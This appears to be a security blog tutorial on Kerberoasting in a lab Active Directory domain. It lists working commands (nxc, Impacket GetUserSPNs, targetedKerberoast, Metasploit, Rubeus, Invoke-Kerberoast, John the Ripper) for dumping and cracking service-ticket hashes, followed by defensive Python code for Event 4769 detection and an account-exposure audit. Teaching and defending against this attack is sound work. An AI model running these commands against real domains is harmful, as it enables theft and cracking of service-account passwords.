This article explores Kerberoasting, a stealthy attack in Active Directory that exploits Service Principal Names (SPNs) to extract and crack TGS ticket hashes, revealing service account passwords. Unlike AS-REP Roasting, it abuses legitimate Kerberos requests. The post details lab setup, exploitation using Impacket, Rubeus, and NXC, and maps the attack to MITRE ATT&CK T1558.003. It also covers detection (Event ID 4769), AES enforcement, and mitigation strategies to defend against this threat.
Table of Contents
- Kerb-roasting Walkthrough
- Prerequisites
- Lab Setup
- Nxc
- Impacket-GetNPUsers
- targetedKerberoast
- Metasploit
- Rubeus
- Windows PowerShell – Kerberoast
Kerb-roasting Walkthrough
Step 1: Attacker Gains Access to the Domain
The attacker first logs into the domain using a valid low-privileged user account. No special permissions or admin access is needed—just any domain user account will do.
Step 2: Enumerate SPNs (Service Principal Names)
The attacker scans the domain to find service accounts that have SPNs associated with them.
These SPNs represent services running on the network—like SQL, HTTP, etc.—and are tied to domain accounts.
Step 3: Request TGS for the SPN
Once the attacker finds SPNs, they request a Ticket Granting Service (TGS) ticket from the Domain Controller (KDC) for those services.
These tickets are encrypted with a key derived from the service account’s password: the NTLM hash when RC4 is used, or an AES key when AES is enforced.
The attacker does not need the password to request the ticket—just the SPN.
Step 4: Extract the TGS Ticket
The attacker extracts the TGS ticket from memory or directly using tools.
Step 5: Crack the TGS Ticket Offline
The encrypted TGS ticket is then cracked offline, using tools such as hashcat or John the Ripper.
The attacker runs a brute-force or dictionary attack to recover the plaintext password of the service account.
Since the ticket is encrypted with the account’s hash, cracking the ticket = getting the password.
Step 6: Use the Cracked Password
If successful, the attacker now has credentials of the service account.
Many service accounts have high privileges (like local admin or even domain admin), or can be used to move laterally, access databases, or escalate privileges.
Prerequisites
- Windows Server 2019 as Active Directory
- Kali Linux
- Tools: Impacket, Metasploit, nxc, targetedKerberoast, Rubeus, PowerShell
- Windows 10/11 – As Client
Lab Setup
In this lab setup, we will assign an SPN to a service account, setting the stage for a kerberoasting attack simulation.
Create the AD Environment:
To simulate an Active Directory environment, you will need a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) where you can run enumeration and exploitation tools.
Domain Controller:
- Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the Active Directory Domain Services
- Set up the domain (this lab uses ignite.local).
Create a Service Account with SPN:
On the Domain Controller (DC), use setspn to assign an SPN to the user raj.
Code:
setspn -a hackingarticles/dc.ignite.local ignite.local\raj
- -a adds an SPN to the user.
- hackingarticles/dc.ignite.local is the SPN.
- ignite.local\raj is the service account.

Method for Exploitation – Kerberoasting Attack (T1558.003)
Attackers (in this case, the Aarti user) can exploit service accounts with SPNs by requesting Kerberos service tickets (TGS) that the account’s NTLM hash encrypts. They can then crack these tickets offline to recover plaintext credentials.
NXC
NXC (formerly CrackMapExec) can perform Kerberoasting efficiently.
Code:
nxc ldap 192.168.1.53 -u aarti -p Password@1 --kerberoasting hash.txt

John the Ripper, combined with a dictionary such as rockyou.txt, can then be used to brute-force a weak service account password from the dumped hash.
Code:
john -w=/usr/share/wordlists/rockyou.txt hash.txt

Impacket-GetNPUsers
Use Impacket’s built-in module GetUserSPNs.py, a Python script that discovers SPNs, requests the TGS, and dumps the service hash, with the following command:
Code:
impacket-GetUserSPNs -request -dc-ip 192.168.1.53 ignite.local/aarti:Password@1
It dumps the service hash, which can then be brute-forced against a dictionary to recover the service account password.

targetedKerberoast
targetedKerberoast is a Python script that can print “kerberoast” hashes for user accounts that have an SPN set.
Clone the repository and install:
Code:
git clone https://github.com/ShutdownRepo/targetedKerberoast.git
cd targetedKerberoast

Run the attack:
Code:
./targetedKerberoast.py --dc-ip '192.168.1.53' -v -d 'ignite.local' -u 'aarti' -p 'Password@1'

Metasploit
The easiest way to enumerate Kerberoastable accounts is with the auxiliary/gather/get_user_spns module, which internally leverages Impacket. This module automatically queries LDAP for Kerberoastable SPNs and requests a Kerberos service ticket for each; if the account uses a weak password, the ticket can be brute-forced offline:
Code:
use auxiliary/gather/get_user_spns
set rhosts 192.168.1.53
set domain ignite.local
set user aarti
set pass Password@1
run

Windows
Rubeus
Rubeus.exe is a terrific tool, as it comes with a kerberoast module that discovers SPNs, extracts the TGS, and dumps the service hash. Run the following command:
Code:
./Rubeus.exe kerberoast /outfile:hash.txt

Windows PowerShell – Kerberoast
You can download Invoke-Kerberoast.ps1, a PowerShell script that is similar to the above module; it discovers the SPN, extracts the TGS, and dumps the service hash. Run it with the following commands:
Code:
Powershell -ep bypass
Import-Module .\Invoke-kerberoast.ps1
Invoke-kerberoast

Detection & Mitigation
Detection
Detecting Kerberoasting is crucial because attackers silently request service tickets, which they can later crack offline.
Key Windows Event ID: 4769
What to Look for in Event ID 4769:
- Ticket Encryption Type: Often 0x17 (RC4) — the easiest to crack.
- Account Name: Look for unusual service account names or high-value users.
- Service Name (SPN): Identify rare or high-privilege SPNs that shouldn’t be accessed frequently.
- Client Address: If TGS requests come from non-privileged or unusual machines/users, it may be suspicious.
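The four indicators above can be turned into simple detection logic. The following is an added example for this post, not code from the original article: it runs over constructed Event ID 4769 records (the field names follow the event’s XML EventData layout; the values are made up for this lab, not captured from a real domain) and flags RC4-encrypted service tickets for user service accounts, plus any single user and client address that pulled tickets for several distinct service accounts in one batch, which is what a bulk SPN sweep by the tools described in this post looks like in the log.

```python
"""Flag Kerberoasting-like patterns in Windows Security Event ID 4769 records.

Added example for this post, not code from the original article. The event
records below are constructed, not captured from a real domain; a real
pipeline would feed 4769 events from a SIEM or a Get-WinEvent export using
the same field names.
"""
from collections import defaultdict

# TicketEncryptionType values as logged in Event ID 4769.
ENC_TYPES = {"0x17": "RC4-HMAC", "0x11": "AES128", "0x12": "AES256"}

# Constructed sample records (assumed field layout: the EventData element names).
SAMPLE_EVENTS = [
    {"TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "raj",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.10", "Status": "0x0"},
    {"TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.10", "Status": "0x0"},
    {"TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "httpsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.10", "Status": "0x0"},
    {"TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.10", "Status": "0x0"},
    {"TargetUserName": "bob@IGNITE.LOCAL", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.20", "Status": "0x0"},
    {"TargetUserName": "bob@IGNITE.LOCAL", "ServiceName": "raj",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.1.20", "Status": "0x0"},
    {"TargetUserName": "alice@IGNITE.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.1.30", "Status": "0x6"},
]


def is_roastable_service(service_name):
    """Only user service accounts matter: machine accounts ($) have long random
    passwords, and krbtgt is not a realistic offline-cracking target."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def analyze_4769(events, sweep_threshold=3):
    """Return findings: one 'rc4_tgs' per RC4 service ticket issued for a user
    service account, plus one 'spn_sweep' per (user, client) pair that pulled
    tickets for at least sweep_threshold distinct service accounts."""
    findings = []
    per_client = defaultdict(set)  # (requesting user, client IP) -> service accounts
    for ev in events:
        if ev.get("Status") != "0x0":  # a failed request yields no ticket to crack
            continue
        svc = ev["ServiceName"]
        if not is_roastable_service(svc):
            continue
        user, ip = ev["TargetUserName"], ev["IpAddress"]
        per_client[(user, ip)].add(svc)
        etype = ev["TicketEncryptionType"]
        if etype == "0x17":
            findings.append({"rule": "rc4_tgs", "user": user, "client": ip,
                             "service": svc, "enc": ENC_TYPES.get(etype, etype)})
    for (user, ip), services in per_client.items():
        if len(services) >= sweep_threshold:
            findings.append({"rule": "spn_sweep", "user": user, "client": ip,
                             "services": sorted(services)})
    return findings


if __name__ == "__main__":
    for finding in analyze_4769(SAMPLE_EVENTS):
        print(finding)
```

On the constructed input this reports three RC4 tickets for aarti from 192.168.1.10 and one sweep finding for that same user and address (raj, sqlsvc and httpsvc); bob’s AES request for a single service and the machine-account and krbtgt tickets are ignored. In a real environment, tune sweep_threshold to the number of distinct SPNs a normal workstation touches in a window, and treat 0x17 as a high-confidence signal once AES is enforced, since a client asking for RC4 in an AES-only domain is itself anomalous.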
Mitigation
Protecting your Active Directory environment from Kerberoasting involves improving password hygiene, SPN configuration, and monitoring.
- Use Strong, Complex Passwords: Ensure service accounts (especially those with SPNs) use long, random, and unique passwords. Avoid reusing passwords or using dictionary words.
- Rotate Passwords Regularly: Implement scheduled password changes for service accounts — especially those tied to SPNs.
- Use Managed Service Accounts (gMSA): These accounts automatically handle complex password management and rotation, significantly reducing risk.
- Avoid Using Highly Privileged Accounts for Services: Don’t assign SPNs to Domain Admins or other privileged accounts. Use separate, least-privilege accounts for services.
- Disable RC4 Encryption: Enforce stronger encryption (AES128: 0x11, AES256: 0x12) via Group Policy on the service accounts and the domain.
- Monitor Event ID 4769 Regularly: Use SIEM tools or scripts to alert on unusual TGS requests.
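The password-age, privileged-account, gMSA and RC4 points above can be checked against the directory itself rather than waiting for a 4769 event. The block below is an added example for this post, not code from the original article: it audits constructed account records shaped like an LDAP export (sAMAccountName, objectClass, servicePrincipalName, msDS-SupportedEncryptionTypes, memberOf, pwdLastSet; in a real audit these would come from ldapsearch, ldap3 or Get-ADUser) and reports which SPN-bearing user accounts still allow RC4, sit in a privileged group, or have not rotated their password within the configured window. The bit values of msDS-SupportedEncryptionTypes are the documented ones; treating an unset attribute as RC4-capable follows the legacy default and is stated as an assumption in the code.

```python
"""Audit Active Directory accounts for Kerberoasting exposure.

Added example for this post, not code from the original article. The account
records are constructed to resemble an LDAP export of the attributes used
below; a real audit would pull them with ldapsearch, ldap3 or Get-ADUser.
objectClass is simplified to its most specific value.
"""
from datetime import datetime, timedelta, timezone

# Bit flags of msDS-SupportedEncryptionTypes.
DES_CRC, DES_MD5, RC4_HMAC, AES128, AES256 = 0x1, 0x2, 0x4, 0x8, 0x10
PRIVILEGED_GROUPS = ("Domain Admins", "Enterprise Admins", "Administrators")
NOW = datetime(2025, 1, 1, tzinfo=timezone.utc)  # fixed "now" so results are reproducible


def days_ago(n):
    return NOW - timedelta(days=n)


# Constructed sample directory (ignite.local is the lab domain from the post).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "raj", "objectClass": "user",
     "servicePrincipalName": ["hackingarticles/dc.ignite.local"],
     "msDS-SupportedEncryptionTypes": None, "memberOf": [], "pwdLastSet": days_ago(400)},
    {"sAMAccountName": "sqlsvc", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/sql01.ignite.local:1433"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=ignite,DC=local"], "pwdLastSet": days_ago(10)},
    {"sAMAccountName": "legacysvc", "objectClass": "user",
     "servicePrincipalName": ["HTTP/legacy.ignite.local"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128 | AES256,
     "memberOf": [], "pwdLastSet": days_ago(30)},
    {"sAMAccountName": "websvc$", "objectClass": "msDS-GroupManagedServiceAccount",
     "servicePrincipalName": ["HTTP/web01.ignite.local"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256, "memberOf": [], "pwdLastSet": days_ago(5)},
    {"sAMAccountName": "DC01$", "objectClass": "computer",
     "servicePrincipalName": ["HOST/dc01.ignite.local"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC | AES128 | AES256,
     "memberOf": [], "pwdLastSet": days_ago(15)},
    {"sAMAccountName": "alice", "objectClass": "user", "servicePrincipalName": [],
     "msDS-SupportedEncryptionTypes": None, "memberOf": [], "pwdLastSet": days_ago(200)},
]


def rc4_allowed(enc_types):
    """Unset or zero means the legacy default applies, which includes RC4
    (assumption: pre-2022 DC behaviour); otherwise test the RC4 bit."""
    return not enc_types or bool(enc_types & RC4_HMAC)


def is_privileged(member_of):
    """True if any group DN names one of the high-value groups."""
    return any(dn.startswith(f"CN={g},") for g in PRIVILEGED_GROUPS for dn in member_of)


def audit_accounts(accounts, max_password_age_days=180):
    """Return {sAMAccountName: [rule, ...]} for accounts that are both
    kerberoastable (a user object with an SPN) and weakly configured."""
    report = {}
    for acct in accounts:
        if not acct["servicePrincipalName"]:
            continue  # no SPN, so no service ticket to request
        if acct["objectClass"] != "user":
            continue  # computers and gMSAs rotate long random passwords automatically
        rules = []
        if rc4_allowed(acct["msDS-SupportedEncryptionTypes"]):
            rules.append("rc4_allowed")
        if is_privileged(acct["memberOf"]):
            rules.append("privileged_spn")
        if NOW - acct["pwdLastSet"] > timedelta(days=max_password_age_days):
            rules.append("stale_password")
        if rules:
            report[acct["sAMAccountName"]] = rules
    return report


if __name__ == "__main__":
    for name, rules in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{name}: {', '.join(rules)}")
```

On the constructed data the report flags raj (RC4 allowed because the attribute is unset, password 400 days old), sqlsvc (SPN on a Domain Admins member) and legacysvc (RC4 bit still set), while the gMSA, the domain controller and the SPN-less user are skipped. Fixing a hit means setting msDS-SupportedEncryptionTypes to AES only, moving the SPN to a least-privilege or group managed service account, and rotating the password, which is exactly the mitigation list above.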